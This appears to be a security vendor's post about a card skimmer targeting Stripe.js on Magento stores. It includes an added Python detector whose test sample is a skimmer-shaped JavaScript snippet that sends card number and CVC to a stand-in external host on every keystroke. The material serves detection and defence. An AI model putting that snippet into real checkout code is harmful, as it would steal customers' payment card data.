The Foregenix DFIR team has discovered what is believed to be an unreported piece of malware which has recently been used to target insecure eCommerce websites processing payments through Stripe, running on the Magento framework.
Although the malware is not unique in its functionality, it means users could have their credit card data stolen even before they have pressed the checkout button. Rather than writing the harvested data to a local file for later retrieval by the attacker, it immediately posts the data to an external server controlled by the attacker using a jQuery AJAX call, as soon as values have been entered into an input field.
What does make the malware distinct is that it directly targets the Stripe.js code for Magento.
This attack is only possible when a website is insecure. To be clear: while the attack focuses on the Stripe.js integration for Magento, it can only take place once the website itself has been hacked. Preventing this attack therefore requires a website administrator or web developer to keep the website secure. Here's an article we recently wrote on Securing Your Magento Website.
In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.
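As an added illustration of what such an internal check can look for (this is not Foregenix's scanner; the indicator patterns, the allowlist and the two sample snippets are constructed), here is a small static check that flags a script which reads card fields, hooks typing events, and posts to a host outside an allowlist:

```python
import re
from urllib.parse import urlparse

# Hosts an untampered Stripe.js checkout is expected to talk to.
# Constructed allowlist: replace with your own store's domains.
ALLOWED_HOSTS = {"js.stripe.com", "api.stripe.com", "shop.example.com"}

# jQuery AJAX / fetch / XHR open() call sites with a literal URL argument.
SEND_RE = re.compile(
    r"(?:\$\.(?:ajax|post|get)|fetch|\.open)\s*\([^)]*?['\"](https?://[^'\"]+)['\"]")
# Handlers that fire while the customer is still typing.
INPUT_EVENT_RE = re.compile(
    r"\.(?:on|bind)\s*\(\s*['\"](?:keyup|keydown|input|change|blur)['\"]"
    r"|\.(?:keyup|change|blur)\s*\(")
# Field names a card skimmer reads from.
CARD_FIELD_RE = re.compile(
    r"card[_-]?number|cc[_-]?num|cvc|cvv|exp(?:iry|_month|_year)", re.I)


def external_targets(js):
    """Return the hosts the script sends to that are not on the allowlist."""
    return [urlparse(u).hostname or "" for u in SEND_RE.findall(js)
            if (urlparse(u).hostname or "") not in ALLOWED_HOSTS]


def assess(js):
    """Report which indicators fired; 'suspicious' requires all three."""
    ext = external_targets(js)
    reads_card = bool(CARD_FIELD_RE.search(js))
    on_input = bool(INPUT_EVENT_RE.search(js))
    return {"external_hosts": ext, "reads_card_fields": reads_card,
            "input_handler": on_input,
            "suspicious": bool(ext) and reads_card and on_input}


# Constructed samples: a normal submit handler and a skimmer-shaped one.
BENIGN = """
$('#payment-form').on('submit', function (e) {
  e.preventDefault();
  $.ajax({url: 'https://shop.example.com/checkout/submit', type: 'POST', data: token});
});
"""
SUSPICIOUS = """
$('#card_number, #cvc').on('keyup', function () {
  $.ajax({url: 'https://collector.invalid/p', type: 'POST',
          data: {n: $('#card_number').val(), c: $('#cvc').val()}});
});
"""
```

Run `assess()` over each JavaScript file served by the store; a hit on all three indicators is worth a manual look, while a single indicator alone (for example an external host) is common in legitimate integrations.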
You can detect these by using a free Guided Threat Review from the Foregenix team.